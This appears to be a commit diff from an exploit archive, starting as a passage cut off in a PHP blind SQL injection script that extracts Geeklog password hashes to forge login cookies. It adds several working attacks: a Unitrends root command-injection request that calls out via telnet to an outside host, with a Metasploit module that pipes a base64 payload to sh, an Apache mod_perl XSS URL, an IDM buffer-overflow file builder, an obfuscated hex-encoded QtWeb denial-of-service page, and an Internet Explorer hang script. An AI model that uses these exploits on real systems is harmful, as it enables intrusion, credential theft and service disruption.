$rst_sql = "0) AND 0 UNION SELECT 1,0x61646d696e5f626c6f636b FROM ".$prefix."users WHERE
".$where." LIMIT 1/*";
$out = _s($url, $cookies, 1, "mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
#then start extraction
$c = array();
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$url = "http://$host:$port".$path;
$_hash = "";
print ("[*] Initiating hash extraction ...\n");
for ($j = 1; $j < 0x21; $j++) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$sql = "0) AND 0 UNION SELECT 1,IF(ASCII(SUBSTR(passwd FROM $j FOR
1))=$i,1,0x61646d696e5f626c6f636b) FROM ".$prefix."users WHERE ".$where." LIMIT 1/*";
$url = "http://$host:$port".$path."usersettings.php";
$out = _s($url, $cookies, 1,
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($sql)."&");
if (is_checked()) {
$f = true;
$_hash .= chr($i);
print "[*] Md5 Hash: ".$_hash.str_repeat("?", 0x20-$j)."\n";
#if found , uncheck again
$out = _s($url, $cookies, 1,
"mode=savepreferences&".$prefix."blocks[0]=".urlencode($rst_sql)."&");
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
}
print "[*] Done! Cookie: geeklog=$uid; password=".$_hash.";\n";
?>

9
platforms/unix/remote/32811.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33880/info
Adobe Flash Player is prone to a remote code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will likely crash the application, denying service to legitimate users.
Versions prior to Flash Player 10.0.12.36 are vulnerable.
http://www.exploit-db.com/sploits/32811.rar

101
platforms/unix/remote/32885.rb Executable file
View file

@ -0,0 +1,101 @@
Unitrends Enterprise Backup 7.3.0
Multiple vulnerabilities exist within this piece of software. The largest one is likely the fact that the auth string used for authorization isnt random at all. After authentication, any requests made by the browser send no cookies and only check this auth param, which is completely insufficient. Because of this, unauthenticated users can know what the auth parameter should be and make requests as the root user.
Unauthenticated root RCE
Because the auth variable is not random, an unauthenticated user can post a specially crafted request to the /recoveryconsole/bpl/snmpd.php PHP script. This script does not sanitize the SNMP community string properly which allows the user to execute remote commands as the root user. A metasploit module that exploits this has been given alongside this report. Below is the actual request. To recreate, after authentication, click on Settings -> Clients, Networking, and Notifications -> SNMP and Modify the notpublic entry to contain bash metacharacters.
POST /recoveryconsole/bpl/snmpd.php?type=update&sid=1&comm=notpublic`telnet+172.31.16.166+4444`&enabled=1&rx=4335379&ver=7.3.0&gcv=0 HTTP/1.1
Host: 172.31.16.99
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://172.31.16.99/recoveryconsole/bpria/bin/bpria.swf?vsn=7.3.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
auth=1%3A%2Fusr%2Fbp%2Flogs%2Edir%2Fgui%5Froot%2Elog%3A100
-----------------------------------
Metasploit module:
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Unitrends Unauthenticated Root RCE",
'Description' => %q{
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>' #discovery/metasploit module
],
'References' =>
[
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Unitrends Enterprise Backup 7.3.0', {}]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python telnet netcat perl'
}
},
'DisclosureDate' => "Mar 21 2014",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
], self.class)
end
def exploit
pay = Rex::Text.encode_base64(payload.encoded)
get = {
'type' => 'update',
'sid' => '1',
'comm' => 'notpublic`echo '+pay+'|base64 --decode|sh`',
'enabled' => '1',
'rx' => '4335379',
'ver' => '7.3.0',
'gcv' => '0'
}
post = {
'auth' => '1:/usr/bp/logs.dir/gui_root.log:100'
}
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'recoveryconsole', 'bpl', 'snmpd.php'),
'vars_get' => get,
'vars_post' => post,
'method' => 'POST'
})
end
end

7
platforms/unix/remote/32890.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/34383/info
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

2
platforms/windows/dos/32706.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Notepad++ - DSpellCheck plugin[DOS]
# Exploit Title: Notepad++ - DSpellCheck v1.2.12.0 plugin[DOS]
# Exploit Author: sajith
# Vendor Homepage: http://notepad-plus-plus.org/
# Software Link: http://notepad-plus-plus.org/download/

26
platforms/windows/dos/32824.pl Executable file
View file

@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/33934/info
Internet Download Manager (IDM) is prone to a remote buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
This issue affects IDM 5.15 Build 3; other versions may also be vulnerable.
#Internet Download Manager v.5.15 Build 3 (4 December)
#Works on Vista
#HellCode Labs || TCC Group || http://tcc.hellcode.net
#Bug was found by "musashi" aka karak0rsan
[musashi@hellcode.net]
#thanx to murderkey
$file="idm_tr.lng";
$lng= "lang=0x1f Türkçe";
$buffer = "\x90" x 1160;
$eip = "AAAA";
$toolbar = "20376=";
$packet=$toolbar.$buffer.$eip;
open(file, '>' . $file);
print file $lng;
print file "\n";
print file $packet;
close(file);
print "File has created!\n";

187
platforms/windows/dos/32881.py Executable file
View file

@ -0,0 +1,187 @@
source: http://www.securityfocus.com/bid/34327/info
QtWeb browser is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
QtWeb 2.0 is vulnerable; other versions may also be affected.
$S="\x3C\x68\x74\x6D\x6C\x3E\x0D\x0A".
"\x3C\x74\x69\x74\x6C\x65\x3E\x51\x74\x57\x65\x62".
"\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x42\x72\x6F\x77\x73\x65".
"\x72\x20\x32". "\x2E\x30\x20".
"\x28\x62". "\x75\x69".
"\x6C\x64". "\x20\x30".
"\x34\x33". "\x29\x20".
"\x52\x65". "\x6D\x6F".
"\x74\x65". "\x20\x44".
"\x65\x6E". "\x69\x61".
"\x6C\x20". "\x6F\x66".
"\x20\x53". "\x65\x72".
"\x76\x69". "\x63\x65".
"\x20\x45". "\x78\x70".
"\x6C\x6F". "\x69\x74". "\x3C\x2F". "\x54\x69".
"\x74\x6C". "\x65". "\x3E". "\x0D". "\x0A". "\x3C\x68".
"\x65\x61". "\x64". "\x3E". "\x3C". "\x62". "\x6F\x64".
"\x79\x3E". "\x3C". "\x73". "\x63". "\x72". "\x69\x70".
"\x74\x20". "\x74\x79".
"\x70\x65". "\x3D\x22".
"\x74\x65". "\x78\x74".
"\x2F\x6A". "\x61\x76".
"\x61\x73". "\x63\x72".
"\x69\x70". "\x74\x22".
"\x3E\x0D". "\x0A\x61".
"\x6C\x65". "\x72\x74".
"\x28\x22". "\x51\x74".
"\x57\x65". "\x62\x20".
"\x49\x6E". "\x74\x65".
"\x72\x6E". "\x65\x74".
"\x20\x42". "\x72\x6F".
"\x77\x73". "\x65\x72".
"\x20\x32". "\x2E\x30".
"\x20\x28". "\x62". "\x75". "\x69\x6C".
"\x64\x20". "\x30". "\x34". "\x33\x29".
"\x20\x52". "\x65". "\x6D". "\x6F\x74".
"\x65\x20". "\x44". "\x65". "\x6E\x69".
"\x61\x6C". "\x20". "\x6F". "\x66\x20".
"\x53\x65". "\x72". "\x76". "\x69\x63".
"\x65\x20". "\x45". "\x78". "\x70\x6C".
"\x6F\x69". "\x74". "\x5C". "\x6E\x5C".
"\x6E\x5C". "\x74". "\x5C". "\x74\x5C".
"\x74\x62". "\x79". "\x20". "\x4C\x69".
"\x71\x75". "\x69". "\x64". "\x57\x6F".
"\x72\x6D". "\x20". "\x28". "\x63\x29".
"\x20\x32". "\x30". "\x30". "\x39\x22".
"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
"\x63\x74". "\x69\x6F".
"\x6E\x20". "\x64\x6F".
"\x7A\x28". "\x29\x20".
"\x7B\x0D". "\x0A\x74".
"\x69\x74". "\x6C\x65".
"\x71\x75". "\x69". "\x64". "\x57\x6F".
"\x72\x6D". "\x20". "\x28". "\x63\x29".
"\x20\x32". "\x30". "\x30". "\x39\x22".
"\x29\x3B". "\x0D\x0A\x66". "\x75\x6E".
"\x63\x74". "\x69\x6F".
"\x6E\x20". "\x64\x6F".
"\x7A\x28". "\x29\x20".
"\x7B\x0D". "\x0A\x74".
"\x69\x74". "\x6C\x65".
"\x3D\x22". "\x48\x6F".
"\x74\x20". "\x49\x63".
"\x65\x22". "\x3B\x0D".
"\x0A\x75". "\x72\x6C".
"\x3D\x22". "\x68\x74".
"\x74\x70\x3A". "\x2F\x2F\x77".
"\x77\x77\x2E\x6D\x69\x6C\x77\x30\x72\x6D\x2E\x63\x6F\x6D\x2F".
"\x22\x3B\x0D\x0A\x69\x66\x20\x28\x77\x69\x6E\x64".
"\x6F\x77\x2E\x73\x69\x64\x65\x62";$M=
"\x61". "\x72" ."\x29". "\x20".
"\x7B". "\x0D" ."\x0A". "\x77". "\x69".
"\x6E"."\x64". "\x6F". "\x77". "\x2E".
"\x73". "\x69". "\x64". "\x65".
"\x62". "\x61". "\x72". "\x2E".
"\x61". "\x64". "\x64". "\x50".
"\x61". "\x6E". "\x65". "\x6C".
"\x28". "\x74". "\x69". "\x74".
"\x6C". "\x65". "\x2C". "\x20".
"\x75". "\x72". "\x6C". "\x2C".
"\x22". "\x22". "\x29". "\x3B".
"\x0D". "\x0A"."\x7D".
"\x20". "\x65". "\x6C".
"\x73";
$I="\x65\x20\x69\x66\x28\x20\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x65\x78\x74\x65\x72\x6E".
"\x61\x6C\x20\x29\x20". ##############
"\x7B\x0D\x0A\x77\x69\x6E\x64". ## #
"\x6F\x77\x2E\x65"."\x78". ######
"\x74\x65\x72\x6E\x61". ########## _ _ _
"\x6C\x2E\x41\x64\x64\x46\x61\x76\x6F\x72\x69". #==---- #==---- #==----
"\x74\x65\x28\x20\x75".
"\x72\x6C\x2C\x20\x74". ##===*
"\x69\x74\x6C\x65\x29\x3B\x0D".
"\x0A\x7D\x20\x65\x6C".
"\x73\x65\x20\x69\x66\x28\x77".
"\x69\x6E\x64\x6F\x77".
"\x2E\x6F\x70\x65\x72\x61\x20";
####################
$L="\x26\x26\x20\x77\x69\x6E\x64\x6F\x77\x2E".
"\x70\x72\x69\x6E\x74\x29\x20\x7B".
"\x20\x0D\x0A\x72\x65\x74".
"\x75\x72\x6E\x20".
"\x28\x74\x72".
"\x75\x65".
"\x29".
"\x3B".
"\x20\x7D".
"\x7D\x0D\x0A".
"\x76\x61\x72\x20".
"\x61\x73\x6B\x20\x3D\x20".
"\x63\x6F\x6E\x66\x69\x72\x6D\x28".
"\x22\x50\x72\x65\x73\x73\x20\x4F\x4B\x20".
"\x74\x6F\x20\x73\x74\x61\x72\x74".
"\x20\x74\x68\x65\x20\x44".
"\x6F\x53\x2E\x5C".
"\x6E\x50\x72".
"\x65\x73".
"\x73".
"\x20".
"\x4E\x6F".
"\x20\x74\x6F".
"\x20\x64\x6F\x64".
"\x67\x65\x20\x74\x68\x65".
"\x20\x44\x6F\x53\x2E\x22\x29\x3B".
"\x0D\x0A\x69\x66\x20\x28\x61\x73\x6B\x20".
"\x3D\x3D\x20\x74\x72\x75\x65\x29".
"\x20\x7B\x20\x0D\x0A\x66".
"\x6F\x72\x20\x28".
"\x78\x3D\x30".
"\x3B\x20".
"\x78".
"\x3C".
"\x78\x2B".
"\x31\x3B\x20".
"\x78\x2B\x2B\x29".
"\x20\x64\x6F\x7A\x28\x29".
"\x3B\x0D\x0A\x7D\x20\x65\x6C\x73".
"\x65\x09\x7B\x20\x61\x6C\x65\x72\x74\x28".
"\x22\x4F\x6B\x20\x3A\x28\x22\x29".
"\x3B\x0D\x0A\x77\x69\x6E".
"\x64\x6F\x77\x2E".
"\x6C\x6F\x63".
"\x61\x74".
"\x69".
"\x6F".
"\x6E\x2E".
"\x68\x72\x65".
"\x66\x20\x3D\x20".
"\x22\x68\x74\x74\x70\x3A".
"\x2F\x2F\x77\x77\x77\x2E\x71\x74".
"\x77\x65\x62\x2E\x6E\x65\x74\x2F\x22\x3B";
#########
$E="\x0D\x0A\x7D\x20".
"\x3C\x2F\x73\x63".
"\x72\x69\x70\x74".
"\x3E\x3C\x2F\x62".
"\x6F\x64\x79\x3E".
"\x3C\x2F\x68\x65".
"\x61\x64\x3E\x3C".
"\x2F\x68\x74\x6D".
"\x6C\x3E";#####____
my $file = "Smile.html";
my $fun = $S.$M.$I.$L.$E;
open (mrowdiuqil, ">./$file") || die "\nMffff... $!\n";
print mrowdiuqil "$fun";
close (mrowdiuqil);
print "\n[+] File $file created with funny potion\!\n\n";

29
platforms/windows/dos/32902.py Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/34478/info
Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.
Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions.
#/usr/bin/env python
import sys
import random
CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]
def send_file():
l = 800000 + 4096
print "Content-Type: text/plain"
print "Content-Length: %d" % l
print "Cache-Control: no-cache, no-store, must-revalidate"
# this is not standardized, but use it anyway
print "Pragma: no-cache"
print ""
# bypass IE download dialog
sys.stdout.write("a" * 4096)
# print junks
for i in xrange(l):
sys.stdout.write(random.choice(CHAR_SET))
sys.exit()
send_file()

Some files were not shown because too many files have changed in this diff Show more